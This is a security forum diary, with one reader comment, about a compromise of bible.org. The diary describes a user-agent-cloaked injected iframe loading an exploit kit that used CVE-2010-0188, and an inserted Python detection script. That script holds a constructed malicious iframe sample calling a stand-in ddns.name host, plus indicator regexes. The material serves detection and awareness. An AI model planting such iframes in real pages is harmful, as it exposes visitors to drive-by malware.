
SANS ISC: When web sites go bad: bible . org compromise - Internet Security | DShield SANS ISC InfoSec Forums

When web sites go bad: bible . org compromise

NOTE: The site is STILL compromised right now. DO NOT VISIT.

This is more of an "awareness" item to show to coworkers and relatives that you can't be careful enough. "bible . org" is a site that, as the name implies, offers access to the bible along with related commentary and translations. Sadly, earlier this week the site apparently got compromised. The owner was notified, but so far hasn't had the means or skills to clean the site.

As in so many cases, the exploit inserts javascript at the very top of the page. This likely happened via a compromised configuration file, but right now we don't know. The malicious content is only served to some browsers, selected by the user agent string, so a plain wget or curl won't get you the malware. You need to specify the user agent string (for wget, set up a .wgetrc file to do this automatically, or use the -U switch).

The exploit inserts an iframe with changing URL following the pattern http://[random string].ddns.name/b6noxa1/counter.php?fid=2 (the domains I saw have been reported to changeip.com ). 
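As an added example (not from the diary or from bible.org), here is a small checker that fetches the same URL once per user agent and flags any iframe whose src matches the pattern quoted above, so a cloaked injection that only appears for browser user agents shows up as a difference between fetches. The sample pages, the hostname `xk3qz.ddns.name`, the user agent strings and the `fetch` callback interface are constructed for illustration.

```python
import re
import urllib.request
from typing import Callable, Dict, List

# Constructed sample pages (not captured from the compromised site): one clean,
# one with an injected iframe at the very top, as the diary describes.
CLEAN_PAGE = "<html><head><title>Home</title></head><body><p>Welcome</p></body></html>"
INJECTED_PAGE = (
    '<iframe src="http://xk3qz.ddns.name/b6noxa1/counter.php?fid=2" '
    'width="1" height="1" style="visibility:hidden"></iframe>\n' + CLEAN_PAGE
)

# Pull the src attribute out of every iframe tag in the document.
IFRAME_RE = re.compile(r'<iframe[^>]+src=["\']?(https?://[^"\'\s>]+)', re.I)
# Indicator pattern from the diary: http://[random string].ddns.name/b6noxa1/counter.php?fid=2
INDICATOR_RE = re.compile(r'^https?://[^/]+\.ddns\.name/b6noxa1/counter\.php\?fid=2$', re.I)

# Constructed user agent set: a default command-line client plus a browser string.
USER_AGENTS = {
    "curl-default": "curl/7.29.0",
    "ie8-win7": "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
}


def find_injected_iframes(html: str) -> List[str]:
    """Return every iframe src in `html` that matches the indicator pattern."""
    return [src for src in IFRAME_RE.findall(html) if INDICATOR_RE.match(src)]


def urllib_fetch(url: str, user_agent: str) -> str:
    """Real fetcher: request `url` with an explicit User-Agent header (not run by the test)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


def compare_user_agents(fetch: Callable[[str, str], str], url: str) -> Dict[str, List[str]]:
    """Fetch `url` once per user agent and report indicator hits for each.

    `fetch(url, user_agent)` returns the page body; pass `urllib_fetch` for a live
    check or a stub that returns canned pages for offline use. A result where the
    browser user agent gets hits and the command-line one does not is exactly the
    cloaking behaviour the diary warns about.
    """
    return {name: find_injected_iframes(fetch(url, ua)) for name, ua in USER_AGENTS.items()}
```

Run such checks only from an isolated analysis host, since a hit means the fetched page carried the exploit kit's loader.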

The wepawet analysis [1] shows that at least one Adobe PDF vulnerability is being exploited, luckily an older one (CVE-2010-0188), but there is an additional PDF that wepawet didn't analyse. It can be tricky to retrieve all components of these exploit kits from a non-vulnerable or simulated browser.

[1] http://wepawet.iseclab.org/view.php?hash=ae81a29e04bd93994c1f92411e58975a&t=1361545134&type=js

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

Looks like it must be fixed now.
bible.org all negative results:
https://www.virustotal.com/en/url/67c895cb6861a5f1c340ed72a5a87ab253f0eb5758a154cb998bfd80a7bece65/analysis/1361666228/
http://urlquery.net/report.php?id=1090906
http://wepawet.iseclab.org/view.php?hash=043f7460996ea401c862f0ae68475623&t=1361666897&type=js

HTML source on Pastebin as of 7pm CST 2/23 on IE10 Win7: http://pastebin.com/qEGSpuhU

I see nothing referencing counter, ddns, and only normal JS mentions of .name (not associated with a TLD)
Anonymous